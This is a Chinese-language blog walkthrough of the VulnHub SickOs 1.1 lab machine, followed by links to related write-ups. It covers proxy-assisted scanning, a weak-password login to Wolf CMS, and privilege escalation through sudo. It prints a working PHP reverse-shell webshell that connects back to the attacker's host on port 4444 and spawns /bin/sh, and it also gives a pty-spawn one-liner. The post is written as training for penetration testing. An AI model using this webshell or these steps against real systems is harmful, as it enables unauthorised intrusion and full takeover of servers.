12-vulnhub-SickOs 1.1

最新推荐文章于 2023-03-18 11:34:58 发布
最新推荐文章于 2023-03-18 11:34:58 发布
阅读量385 收藏
点赞数
分类专栏: vulnhub50 文章标签: 数据库 python linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43809826/article/details/119339114
版权

vulnhub-SickOs 1.1

靶机地址:https://www.vulnhub.com/entry/sickos-11,132/

目标:得到root权限&找到flag.txt

作者:尼德霍格007

时间:2021-8-2

一、信息收集

扫描目标主机ip地址

nmap -sP 192.168.21.0/24

image-20210802224724035

可以看到靶机ip地址是192.168…21.148,192.168.21.128是kali攻击机的ip地址

接下来扫描开放的端口

nmap -A -p 1-64000 192.168.21.148

image-20210802225454727

可以看到靶机开放了22,3128,和一个8080端口且3128是个代理端口,

用nikto扫描一下

nikto -h 192.168.21.148 -useproxy http://192.168.21.148:3128

image-20210802230206730

用nikto扫描出很多信息,透露了/cgi-bin/status位置(容易受到shellshock攻击),这边还存在robots.txt,访问一下robots.txt

我们先开启代理,如果不用代理80是没打开的

image-20210802225707741

然后访问它的80端口

image-20210802225750476

祝贺你!!!看了一下源码没啥信息

打开robots

image-20210802230624085

发现一个目录/wolfcms,经过百度之后发现这是一个内容管理系统并且存在文件上传漏洞

image-20210802231228993

网上找了下别人登录cms的链接

http://192.168.21.148/wolfcms/?/admin/login

image-20210802231332207

试试弱密码

使用admin/admin登陆成功

image-20210802231400793

Files选项里面可以上传文件或者更改文件

image-20210802231444743

二、获取shell

创建一个反弹shell的木马

<?php
$sock=fsockopen('192.168.21.128',4444);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>

把它保存为php文件,然后上传

image-20210803005436283

在kali中开启监听

image-20210803005605279

之后在这里点击访问上传的nide.php文件

http://192.168.21.148/wolfcms/public/

即可获得shell

image-20210803005644007

找一下,很容易就找到了配置文件,在其中发现了数据库账户和密码

image-20210803005909353

这里可以使用python进入tty

python -c 'import pty;pty.spawn("/bin/bash")'

看看有哪儿些用户

image-20210803010459870

三、提权

有个sickos用户,试试能不能用刚才获得数据库密码登录

image-20210803010634015

试了一下,还真行

查看一下用户id,发现sickos用户在sudo组里,所以这里直接sudo提权,得到root权限

image-20210803010746158

image-20210803011031927

四、总结

这次靶机渗透中间遇到了好几次障碍,后来各种百度谷歌终于解决了,其中涉及的shell反弹木马、提权等还需要我进一步学习。

尼德霍格007
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
「红队笔记」靶机精讲:SickOS1.1 - 穿越Squid代理的CMS渗透
m0_73612768的博客
11-29 1125
本文是作者在观看B站《红队笔记》后做的一些笔记以及相关知识的补充。靶机精讲之SickOS1.1,vulnhub靶机,需要配置代理,穿越Squid实现对CMS渗透,完整的攻击链,对基本功要求比较高,不难,但也需要全局观和细节操作。能顺利完成本机渗透,也证明你在不断进步。此为方法一,本机还有全然不同的第二种打法。
红队打靶:SickOS1.1详细打靶思路(vulnhub
Bossfrank的博客
06-07 1065
本文是vulnhub靶机sickos详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。本文使用了squid代理分析+wolfcms渗透的思路获取shell。下一篇文章将详述利用shellshock漏洞进行渗透的思路。
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1819
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
Vulnhub系列:SickOS1.1
Ays.Ie的博客
03-05 401
继续更新vulnhub的靶机,巩固渗透技术,分享做题思路,打开思维局限
SickOs1.1
m0_66299232的博客
09-23 1055
其后台入口是http://192.168.166.129/wolfcms/?nmap -p- -A -T4 -sV 192.168.166.129 //探测目标靶机开放端口和相应服务情况。6.使用weevely连接木马,因为url需要代理才可以访问,这里需要现在环境变量中配置代理。上传成功,下一步用weevely来连接,连接的时候后面一定也要带cmd 这是密码。7.连接成功后在网站目录下发现config.php文件,发现数据库密码。cmd是密码 /root/weiqin.php 是路径。
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 ...
pokemon-gpt-2
04-23
对于那些想要在本地运行此代码的人(sickos!),以下是关键文件的简要说明: image - to - text.py-将图像转换为基于文本的格式以进行训练。 text- to - image.py-将基于文本的图像格式转换为PNG。 train.py-用...
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
跟着我们目录简单的 操作系统-2.0 DE-ICE:S1.120 Hackademic-RTB1 Tr0ll 1 21 LTR:场景1 Kioptrix:1.1级Kioptrix:1.2级Kioptrix:1.3级Kioprtix:5 安全操作系统:1 订书机SickOS 1.1 SickOS 1.2 简单的凯夫吉尔...
红队渗透靶场之SickOs1.1
xf555er的博客
12-06 962
shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的函数定义后添加多余的字符串会触发此漏洞, 攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,甚至完全控制目标系统bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令执行CGI 时会调用Bash将Referer、h
VulnHub-SickOs1.1
热门推荐
江左盟的博客
07-07 1万+
信息收集 使用 漏洞发现 漏洞利用
SICKOS: 1.1(内含两种解法)
Mysmycbx的博客
03-18 592
但是通过阅读博客,没有啥信息,web上也不到默认用户和密码。扫3128,也扫不到任何东西,那就把3128做代理扫描80端口,扫描到几个文件,一一查看。发现可以编辑php代码,直接写入反弹shell,go。写入,保存,监听,访问,一气呵成。没扫到啥有用的信息,但是博客肯定有后台呀,这里没有搜到,去网上去搜搜。原来是定时执行connect.py文件,那就构造个反弹shell,写入文件中。通过阅读web目录下的文件,发现了数据库连接文件,发现到一个密码。通过搜索,发现3128端口是负责代理的。
Vulnhub靶机:SICKOS_ 1.1
LainWith的博客
12-09 648
SickOs(此系列共2台)发布日期:2015年12月11日难度:初-中运行环境:VMware Workstation目标:取得 root 权限 + Flag主机发现端口扫描+漏洞扫描代理扫描搜寻网站后台后台写入shell计划任务提权破壳漏洞拿shell。
靶机SickOs1.1
学习!冲冲冲!
02-12 152
靶机SickOs1.1
OSCP Sickos 1.1 靶机渗透
Shadow的博客
03-23 315
Sickos 1.1 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-03-23 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 Sickos 1.1主机ip为172.16.1.10 nmap 扫描一下 nmap -p- -A 172.16.1.10 主机开放了代理服务器,
vulhub——SickOs: 1.1
战神/calmness的博客
06-04 383
下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 目标机器地址:192.168.243.137 攻击机器地址:192.168.18.148 目录 信息收集 扫描 设置代理 wolfcms 上传木马 并且 访问 SSH登录 sudo提权 信息收集 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubunt..
Vulnhub靶机SickOs1.1渗透
xingjinhao123的博客
02-26 300
靶机介绍 官方下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 目标是获取root目录下的a0216ea4d51874464078c618298b1367.txt文件 发布日期是2015年11月 运行环境: 靶机:网络连接方式设为自动桥接,IP地址:192.168.1.76 攻击机:通网段下的kali linux,IP地址:192.168.1.44 开始渗透 运行靶机 获取靶机IP地址 扫描端口,没有发现熟悉的80端口 使用nikto简单扫一下312
Vulnhub靶机系列:SickOs: 1.1
汗的博客
04-19 1111
这次的靶机是Vulnhub靶机: 靶机地址及相关描述 靶机设置 利用知识及工具 信息收集并getshell 提权 总结
VulnHub靶机-SickOs1.1
Slow_的博客
02-22 743
VulnHub靶机-SickOs1.1 下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 下载靶机后在VMware Workstation下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.195 靶机:192.168.8.194 文章目录VulnHub靶机-SickOs1.1一、信息搜集二、Getshell三、提权 一、信息搜集 nmap探测存活主机,找到目标靶机 命令:nmap -sP 192.168.
OSCP - SickOS:1.1 writeup
Jiajiajiang_的博客
04-15 682
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 发现IP 安装成功后,查找此虚拟机的IP,我使用的是netdiscover 地址为10.0.3.143 nmap nmap -sV -p- 10.0.3.143 漏扫 想了一下突破口肯定不是ssh,就从3128端口入手把...
vulnhub靶机系列:
最新发布
09-09
3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼德霍格007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值